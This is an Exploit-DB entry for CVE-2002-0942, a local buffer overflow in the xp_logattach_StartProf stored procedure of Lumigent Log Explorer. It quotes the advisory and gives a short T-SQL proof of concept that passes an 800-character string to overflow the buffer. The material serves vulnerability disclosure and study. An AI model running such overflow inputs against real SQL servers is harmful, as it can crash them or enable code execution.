Lumigent Log Explorer XP - _LogAttach_StartProf Buffer Overflow

EDB-ID:

21550

CVE:

2002-0942

EDB Verified:

Author:

Martin Rakhmanoff

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2002-06-14

Vulnerable App: 
source: https://www.securityfocus.com/bid/5016/info

A buffer overflow vulnerability in xp_logattach.dll has been reported for Lumigent Log Explorer. Specifically, this affects the xp_logattach_StartProf stored procedure.

If this condition is successfully exploited, it is possible for locations in memory to be overwritten with attacker-supplied instructions, allowing for code execution as the SQL server process. By default, SQL Server runs as a non-privileged user.

It should be noted that extended stored procedures can be run only by the dbo user by default.

declare @bo varchar(8000)
set @bo = replicate('A', 800)
exec xp_logattach_StartProf @bo
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services